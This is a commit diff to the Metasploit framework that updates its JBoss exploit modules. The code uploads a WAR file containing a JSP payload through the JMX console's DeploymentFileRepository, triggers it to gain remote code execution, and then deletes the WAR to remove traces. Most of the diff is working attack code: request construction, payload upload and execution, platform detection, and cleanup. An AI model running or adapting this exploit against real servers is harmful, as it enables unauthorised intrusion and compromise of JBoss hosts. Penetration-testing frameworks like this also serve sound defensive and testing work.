another update for jboss stuff, thanks Patrick!

git-svn-id: file:///home/svn/framework3/trunk@9596 4d416f70-5f16-0410-b530-b9f4589650da
unstable
Joshua Drake 2010-06-23 22:25:03 +00:00
parent 920710a5fd
commit 099b90b0d6
3 changed files with 121 additions and 62 deletions

View File

@ -75,6 +75,7 @@ class Metasploit3 < Msf::Exploit::Remote
verb = 'HEAD'
end
p = payload
if datastore['SHELL'] == 'automatic'
if not (plat = detect_platform())
raise RuntimeError, 'Unable to detect platform!'
@ -92,7 +93,7 @@ class Metasploit3 < Msf::Exploit::Remote
# Payload generation already happened, therefore SHELL will
# already be 'automatic' in the payload regardless of what we set above.
# To fix this, we regenerate the payload now..
return if ((p = regenerate_payload(cli)) == nil)
return if ((p = regenerate_payload(platform, target_arch)) == nil)
end
# The following Beanshell script will write the exploded WAR file to the deploy/

View File

@ -53,13 +53,18 @@ class Metasploit3 < Msf::Exploit::Remote
[
Opt::RPORT(8080),
OptString.new('SHELL', [ true, "The system shell to use.", 'automatic']),
OptString.new('PATH', [ true, "Deployment path", rand_text_alphanumeric(8+rand(8))]),
OptString.new('JSP', [ true, "JSP filename (without .jsp extension)", rand_text_alphanumeric(8+rand(8))]),
OptString.new('JSP', [ false, 'JSP name to use without .jsp extension (default: random)', nil ]),
OptString.new('APPBASE', [ false, 'Application base name, (default: random)', nil ]),
OptString.new('PATH', [ true, 'The URI path of the JMX console', '/jmx-console' ]),
OptString.new('VERB', [ true, "The HTTP verb to use", "POST"]),
], self.class)
end
def exploit
jsp_name = datastore['JSP'] || rand_text_alphanumeric(8+rand(8))
app_base = datastore['APPBASE'] || rand_text_alphanumeric(8+rand(8))
p = payload
if datastore['SHELL'] == 'automatic'
if not (plat = detect_platform())
raise RuntimeError, 'Unable to detect platform!'
@ -74,42 +79,49 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("SHELL set to #{datastore['SHELL']}")
return if ((p = regenerate_payload(cli)) == nil)
return if ((p = regenerate_payload(plat, target_arch)) == nil)
end
#
# UPLOAD
#
data = 'action=invokeOpByName'
data << '&name=jboss.admin%3Aservice%3DDeploymentFileRepository'
data << '&methodName=store'
data << '&argType=java.lang.String'
data << '&arg0=' + Rex::Text.uri_encode(datastore['PATH']) + '.war'
data << '&arg0=' + Rex::Text.uri_encode(app_base) + '.war'
data << '&argType=java.lang.String'
data << '&arg1=' + datastore['JSP']
data << '&arg1=' + jsp_name
data << '&argType=java.lang.String'
data << '&arg2=.jsp'
data << '&argType=java.lang.String'
data << '&arg3=' + Rex::Text.uri_encode(payload.encoded)
data << '&arg3=' + Rex::Text.uri_encode(p.encoded)
data << '&argType=boolean'
data << '&arg4=True'
if (datastore['VERB'] == "POST")
res = send_request_cgi(
{
'uri' => '/jmx-console/HtmlAdaptor',
'uri' => datastore['PATH'] + '/HtmlAdaptor',
'method' => datastore['VERB'],
'data' => data
}, 5)
else
res = send_request_cgi(
{
'uri' => '/jmx-console/HtmlAdaptor;index.jsp?' + data,
'uri' => datastore['PATH'] + '/HtmlAdaptor;index.jsp?' + data,
'method' => datastore['VERB'],
}, 5)
end
#
# EXECUTE
#
# Using HEAD may trigger a 500 Internal Server Error (at leat on 4.2.3.GA),
# but the file still gets written.
if (res.code == 200 || res.code == 500)
uri = '/' + datastore['PATH'] + '/' + datastore['JSP'] + '.jsp'
uri = '/' + app_base + '/' + jsp_name + '.jsp'
print_status("Triggering payload at '#{uri}'...")
verb = 'GET'
if (datastore['VERB'] != 'GET' and datastore['VERB'] != 'POST')
@ -132,17 +144,64 @@ class Metasploit3 < Msf::Exploit::Remote
elsif res.code == 200
print_status("Successfully triggered payload at '#{uri}'.")
break
end
end
else
print_error("Denied...")
end
end
#
# DELETE
#
# The WAR can only be removed by physically deleting it, otherwise it
# will get redeployed after a server restart.
print_status("Undeploying #{uri} by deleting the WAR file via DeploymentFileRepository.remove()...")
res1 = delete_file(Rex::Text.uri_encode(app_base) + '.war', jsp_name, '.jsp')
res2 = delete_file('./', Rex::Text.uri_encode(app_base) + '.war', '')
[res1, res2].each do |res|
if !res
print_error("WARNING: Unable to remove WAR [No Response]")
end
if (res.code < 200 || res.code >= 300)
print_error("WARNING: Unable to remove WAR [#{res.code} #{res.message}]")
end
end
handler
end
end
# Delete a file with DeploymentFileRepository.remove().
def delete_file(folder, name, ext)
data = 'action=invokeOpByName'
data << '&name=jboss.admin%3Aservice%3DDeploymentFileRepository'
data << '&methodName=remove'
data << '&argType=java.lang.String'
data << '&arg0=' + folder
data << '&argType=java.lang.String'
data << '&arg1=' + name
data << '&argType=java.lang.String'
data << '&arg2=' + ext
if (datastore['VERB'] == "POST")
res = send_request_cgi(
{
'uri' => datastore['PATH'] + '/HtmlAdaptor',
'method' => datastore['VERB'],
'data' => data
}, 5)
else
res = send_request_cgi(
{
'uri' => datastore['PATH'] + '/HtmlAdaptor;index.jsp?' + data,
'method' => datastore['VERB'],
}, 5)
end
res
end
def detect_platform
print_status("Attempting to automatically detect the platform...")
path = '/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo'
path = datastore['PATH'] + '/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo'
res = send_request_raw(
{
'uri' => path,

View File

@ -39,7 +39,7 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'URL', 'http://www.redteam-pentesting.de/publications/jboss' ]
],
'Privileged' => true,
'Platform' => [ 'win', 'linux' ],
'Platform' => [ 'win', 'linux', 'java' ],
'Stance' => Msf::Exploit::Stance::Aggressive,
'Targets' =>
[
@ -138,6 +138,7 @@ class Metasploit3 < Msf::Exploit::Remote
else
print_status("Using manually select target \"#{mytarget.name}\"")
end
arch = mytarget.arch
# Find out which shell if we're using a Java target
if (mytarget.name =~ /Java/)
@ -153,15 +154,13 @@ class Metasploit3 < Msf::Exploit::Remote
end
print_status("SHELL set to #{datastore['SHELL']}")
else
# set arch/platform from the target
arch = mytarget['Arch']
plat = [Msf::Module::PlatformList.new(mytarget['Platform']).platforms[0]]
end
# We must regenerate the payload in case our auto-magic changed something.
return if ((p = regenerate_payload(cli)) == nil)
return if ((p = regenerate_payload(plat, arch)) == nil)
# Generate the WAR containing the payload
if (mytarget.name =~ /Java/)